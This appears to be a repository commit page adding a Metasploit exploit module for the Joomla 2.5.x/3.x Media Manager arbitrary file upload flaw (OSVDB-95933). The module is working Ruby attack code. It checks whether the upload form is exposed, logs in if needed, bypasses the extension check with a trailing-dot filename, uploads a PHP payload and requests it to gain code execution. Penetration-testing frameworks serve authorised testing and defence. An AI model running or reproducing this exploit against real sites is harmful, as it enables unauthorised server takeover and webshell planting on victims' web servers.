Land #2219 - OSVDB-95933: Joomla Media Manager File Upload Vulnerability
commit
54cffdb27d
|
@ -0,0 +1,235 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Joomla Media Manager File Upload Vulnerability",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as
|
||||
3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component,
|
||||
which comes by default in Joomla, allowing arbitrary file uploads, and results in
|
||||
arbitrary code execution. The module has been tested successfully on Joomla 2.5.13
|
||||
and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media
|
||||
Manager, you will need to supply a valid username and password (Editor role or
|
||||
higher) in order to work properly.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '95933' ],
|
||||
[ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ],
|
||||
[ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
# Arbitrary big number. The payload gets sent as POST data, so
|
||||
# really it's unlimited
|
||||
'Space' => 262144, # 256k
|
||||
},
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Joomla 2.5.x <=2.5.13', {} ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Aug 01 2013",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
|
||||
OptString.new('USERNAME', [false, 'User to login with', '']),
|
||||
OptString.new('PASSWORD', [false, 'Password to login with', '']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def peer
|
||||
return "#{rhost}:#{rport}"
|
||||
end
|
||||
|
||||
def check
|
||||
res = get_upload_form
|
||||
|
||||
if res and res.code == 200
|
||||
if res.body =~ /You are not authorised to view this resource/
|
||||
print_status("#{peer} - Joomla Media Manager Found but authentication required")
|
||||
return Exploit::CheckCode::Detected
|
||||
elsif res.body =~ /<form action="(.*)" id="uploadForm"/
|
||||
print_status("#{peer} - Joomla Media Manager Found and authentication isn't required")
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def upload(upload_uri)
|
||||
begin
|
||||
u = URI(upload_uri)
|
||||
rescue ::URI::InvalidURIError
|
||||
fail_with(Exploit::Failure::Unknown, "Unable to get the upload_uri correctly")
|
||||
end
|
||||
|
||||
data = Rex::MIME::Message.new
|
||||
data.add_part(payload.encoded, "application/x-php", nil, "form-data; name=\"Filedata[]\"; filename=\"#{@upload_name}.\"")
|
||||
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{u.path}?#{u.query}",
|
||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'cookie' => @cookies,
|
||||
'vars_get' => {
|
||||
'asset' => 'com_content',
|
||||
'author' => '',
|
||||
'format' => '',
|
||||
'view' => 'images',
|
||||
'folder' => ''
|
||||
},
|
||||
'data' => post_data
|
||||
})
|
||||
|
||||
return res
|
||||
|
||||
end
|
||||
|
||||
def get_upload_form
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "index.php"),
|
||||
'cookie' => @cookies,
|
||||
'encode_params' => false,
|
||||
'vars_get' => {
|
||||
'option' => 'com_media',
|
||||
'view' => 'images',
|
||||
'tmpl' => 'component',
|
||||
'e_name' => 'jform_articletext',
|
||||
'asset' => 'com_content',
|
||||
'author' => ''
|
||||
}
|
||||
})
|
||||
|
||||
return res
|
||||
end
|
||||
|
||||
def get_login_form
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "index.php", "component", "users", "/"),
|
||||
'cookie' => @cookies,
|
||||
'vars_get' => {
|
||||
'view' => 'login'
|
||||
}
|
||||
})
|
||||
|
||||
return res
|
||||
|
||||
end
|
||||
|
||||
def login
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, "index.php", "component", "users", "/"),
|
||||
'cookie' => @cookies,
|
||||
'vars_get' => {
|
||||
'task' => 'user.login'
|
||||
},
|
||||
'vars_post' => {
|
||||
'username' => @username,
|
||||
'password' => @password
|
||||
}.merge(@login_options)
|
||||
})
|
||||
|
||||
return res
|
||||
end
|
||||
|
||||
def parse_login_options(html)
|
||||
html.scan(/<input type="hidden" name="(.*)" value="(.*)" \/>/) {|option|
|
||||
@login_options[option[0]] = option[1] if option[1] == "1" # Searching for the Token Parameter, which always has value "1"
|
||||
}
|
||||
end
|
||||
|
||||
def exploit
|
||||
@login_options = {}
|
||||
@cookies = ""
|
||||
@upload_name = "#{rand_text_alpha(rand(5) + 3)}.php"
|
||||
@username = datastore['USERNAME']
|
||||
@password = datastore['PASSWORD']
|
||||
|
||||
print_status("#{peer} - Checking Access to Media Component...")
|
||||
res = get_upload_form
|
||||
|
||||
if res and res.code == 200 and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/
|
||||
print_status("#{peer} - Authentication required... Proceeding...")
|
||||
|
||||
if @username.empty? or @password.empty?
|
||||
fail_with(Exploit::Failure::BadConfig, "#{peer} - Authentication is required to access the Media Manager Component, please provide credentials")
|
||||
end
|
||||
@cookies = res.get_cookies.sub(/;$/, "")
|
||||
|
||||
print_status("#{peer} - Accessing the Login Form...")
|
||||
res = get_login_form
|
||||
if res.nil? or res.code != 200 or res.body !~ /login/
|
||||
fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Login Form")
|
||||
end
|
||||
parse_login_options(res.body)
|
||||
|
||||
res = login
|
||||
if not res or res.code != 303
|
||||
fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to Authenticate")
|
||||
end
|
||||
elsif res and res.code ==200 and res.headers['Set-Cookie'] and res.body =~ /<form action="(.*)" id="uploadForm"/
|
||||
print_status("#{peer} - Authentication isn't required.... Proceeding...")
|
||||
@cookies = res.get_cookies.sub(/;$/, "")
|
||||
else
|
||||
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to Access the Media Manager Component")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Accessing the Upload Form...")
|
||||
res = get_upload_form
|
||||
|
||||
if res and res.code == 200 and res.body =~ /<form action="(.*)" id="uploadForm"/
|
||||
upload_uri = Rex::Text.html_decode($1)
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Upload Form")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Uploading shell...")
|
||||
|
||||
res = upload(upload_uri)
|
||||
|
||||
if res.nil? or res.code != 200
|
||||
fail_with(Exploit::Failure::Unknown, "#{peer} - Upload failed")
|
||||
end
|
||||
|
||||
register_files_for_cleanup("#{@upload_name}.")
|
||||
print_status("#{peer} - Executing shell...")
|
||||
send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "images", @upload_name),
|
||||
})
|
||||
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue